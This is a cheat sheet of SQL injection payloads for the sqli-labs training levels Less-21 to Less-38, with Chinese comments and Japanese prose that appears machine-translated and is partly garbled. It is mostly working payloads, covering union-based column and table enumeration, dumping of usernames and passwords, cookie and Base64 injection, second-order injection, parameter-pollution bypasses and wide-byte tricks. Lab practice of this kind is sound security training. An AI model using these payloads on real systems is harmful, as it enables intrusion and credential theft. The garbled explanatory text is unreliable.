SQLインジェクションの基本的な声明:
order by 4
判断有多少列
union select 1,2,3
判断数据显示点
union select 1,user(),database()
显示出登录用户和数据库名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3
查看数据库有哪些表
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3
查看对应表有哪些列
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3
查看账号密码信息
ページ-2(アドバンス注射剤)の高度な射出less21-38
文字の少ない-21--「)クッキーインジェクションに基づきます
以下のページに最初に通常の着陸
第二に、使用げっぷSuiteは、現在のページをキャプチャします。
第三のリピータはCtrl + B Base64エンコーディングにモジュールの選択された部分
噴射文:
') union select 1,2,3#
编码后:JykgdW5pb24gc2VsZWN0IDEsMiwzIyA=
第四に、通常の表示は、その後、私はあなたがそれを行う方法を知っていると信じて
注射クッキーの「文字ベース少ないです-22--
インジェクションの文:
uname=" union select 1,2,3# ;
上記の手順
注釈付きの少ない-23--フィルタ式射出GET
インジェクションの文:
id=-1' union select 1,2,3 ='1
あまり-24--二次注入
知っていると仮定しますが、パスワードの管理ユーザー知らない
最初のクリックを新しいユーザーは、こちらをクリックしてください?登録管理者「 - -ユーザー
当時とパスワードを変更するには、ユーザーにログオンする
だけで管理者の管理を使用して、入力した」 - -変更パスワードの
ログインに成功した、2つのアカウントのために同じパスワードを
以下-25--濾過し、注入し、単一引用符
インジェクションの文:
id=-1' union select 1,2,3--
以下-25a--し、濾過し、数値の注射
インジェクションの文:
id=-1 union select 1,2,3--
あまり-26--文字ベースの単一引用符、そして濾過注入の注釈の空白
インジェクションの文:
id=-1'aandnd(updatexml(1,'~aaaa',1))anandd'1'='1
「あまり26a--に基づく)コメントや文字スペースブラインドをフィルタリング
ここでは、文句を言うが、余分な括弧を追加していません。
射出文字フィルタリング組合に基づいて以下-27--」、注釈やスペースを選択
インジェクションの文:
id=1'and(updatexml(1,'~aaaa',1))and'1'='1
あまり27a--「を選択した文字に基づいて、濾過組合ブラインド
上記のように二重引用符に単一引用符、。
あまり-28--「)注射文字をフィルタリングに基づいており、他の組合を選択
インジェクションの文:
网址栏url后
http://localhost/sqli-labs-master/Less-28/?id=111%27)%0AUnIon%0AAll%0ASelect%0A(%271%27),2,(%273
url
转码前
id=111') UnIon All Select ('1'),2,('3
文字フィルター組合)」あまり28a--に基づいて、ブラインドやスペースを選択
インジェクションの文:
网址栏url后
http://localhost/sqli-labs-master/Less-28a/?id=-1%27)%0AUnIon%0AAll%0ASelect%0A1,2,3%0A--%20-
url转码前
id=-1') UnIon All Select 1,2,3 -- -
注入による単一引用符文字index.php--少ない-29
インジェクションの文:
id=-1' union select 1,2,3 -- -
login.php--単一引用符バイパスのパラメータに基づく汚染オフ隠さ少ない-29
インジェクションの文:
id=1&id=-1' union select 1,2,3 -- -
あまり-30 index.php--二重引用符の注入に基づきます
インジェクションの文:
id=-1" union select 1,2,3 -- -
あまり-30は、二重引用符汚染バイパスのパラメータに基づいてオフに隠さlogin.php--
インジェクションの文:
id=1&id=-1" union select 1,2,3 -- -
文字の少ない-31--)」に基づく注入
インジェクションの文:
id=-1") union select 1,2,3 -- -
login.php--パラメータに基づいて汚染「オフ隠さ以下-31)バイパス
インジェクションの文:
id=1&id=-1") union select 1,2,3 -- -
射出バイト幅の少ないです32--
インジェクションの文:
id=-1%df' union select 1,2,3 -- -
あまり-33 - バイトワイドモード注入を得ます
URLフィールドに注入文は、次のコマンドを入力します。
id=-1%df%27%20union%20select%201,2,3%20--%20-
あまり-34 - ポストインジェクションモードバイト幅
インジェクションの文:
Dumb�' union select 1,2,3 --
あまり-35--数値注入
インジェクションの文:
id=-1 union select 1,2,3
射出バイト幅の少ないです36--
インジェクションの文:
id=-1�' union select 1,2,3 -- -
ワイドポスト噴射バイト以下-37--
インジェクションの文:
Dumb�' union select 1,2 --
ワイドポスト噴射バイト以下-38--
インジェクションの文:
id=-1�' union select 1,2,3 -- -
id=-1�' union select 1,2,3 -- -